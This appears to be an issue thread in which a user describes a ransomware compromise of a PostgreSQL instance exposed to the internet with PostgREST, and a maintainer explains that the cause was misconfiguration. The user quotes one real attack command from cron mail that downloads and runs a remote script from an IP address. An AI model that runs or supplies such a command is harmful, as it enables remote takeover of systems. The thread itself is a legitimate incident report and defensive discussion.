Remote hacking of PostgREST ??

[JLacal]

Hello:

My local instance of PostgresApp was hacked and the data exfiltrated for ransom. See attached images.

I was using PostgREST.

Alternatively, the problem could be with PostgresApp. (I already filed a separate report there).

macOS: Sonoma 14.6

Hardware: an old mac Mini.
Model Name: Mac mini
Model Identifier: Macmini8,1
Processor Name: 6-Core Intel Core i7
Processor Speed: 3.2 GHz
Number of Processors: 1
Total Number of Cores: 6
L2 Cache (per Core): 256 KB
L3 Cache: 12 MB
Hyper-Threading Technology: Enabled
Memory: 64 GB

This is the sequence of events:

1. I secured a fixed IP address from my local fiber provider on Friday July 26.

2. I opened port 5432 on the router and forwarded the port to the mac Mini's port 5432. Friday July 26 at 13:00 hr. UTC.

I sent the access credentials to my team (username and password).
I specifically changed the PostgresApp's password.

3. I also installed PostgREST, allowing anonymous, read-only access to the schema that was exfiltrated.

4. The PostgresApp has this setting "Ask for permission when apps connect without password." I believe the problem starts here.

5. Over the weekend I received several pop-up messages from the PostgresApp along the lines of "something wants to connect with app." I mindlessly accepted a couple of times, thinking it was my team members requesting remote access.

Today the mac Mini rebooted a couple of times. That was curious.

This afternoon the Terminal window in the mac Mini kept on saying "You have email"

When I looked at the mail messages I read several messages with this text:

"curl http://185.122.204.197/pg.sh | sh > /dev/null 2>&1"

That IP address seems to be registered to a Russian-based service provider.

The attackers left behind a new schema in the app: "readme_to_recover"

Question:

• How were the attackers able to create cron jobs at the OS level by breaking through PostgresApp / PostgREST?

In any case, I just deleted the hard disk partitions and formatted the mac Mini's disk. I re-installed macOS on an empty partition.

Suggestions welcome. Regards.

[wolfgangwalther]

I opened port 5432 on the router and forwarded the port to the mac Mini's port 5432. Friday July 26 at 13:00 hr. UTC.
[...]
The PostgresApp has this setting "Ask for permission when apps connect without password." I believe the problem starts here.
[...]
Over the weekend I received several pop-up messages from the PostgresApp along the lines of "something wants to connect with app." I mindlessly accepted a couple of times, thinking it was my team members requesting remote access.

So you opened the PostgreSQL port to the public and allowed connections without password. This is neither a problem with PostgreSQL nor PostgREST - it's a problem with your configuration.

The email you received was from your local cron daemon, which is telling you that the curl command was tried to be executed, but failed. It seems like this was supposed to download another shell script to possibly extend the privileges the attacker already gained.

In your position, I would also carefully analyze all the other machines in the same network as the mac mini, to rule out that any other machines had been compromised after that.

In any case: There is no bug anywhere, not in PostgREST, not in PostgreSQL. You need to make sure to secure access to your PostgreSQL instance properly. The best approach is to set up a SSH server, only allow public key authentication for it and expose only the SSH port to the public. Then have your team members connect via SSH tunnel to the PostgreSQL instance.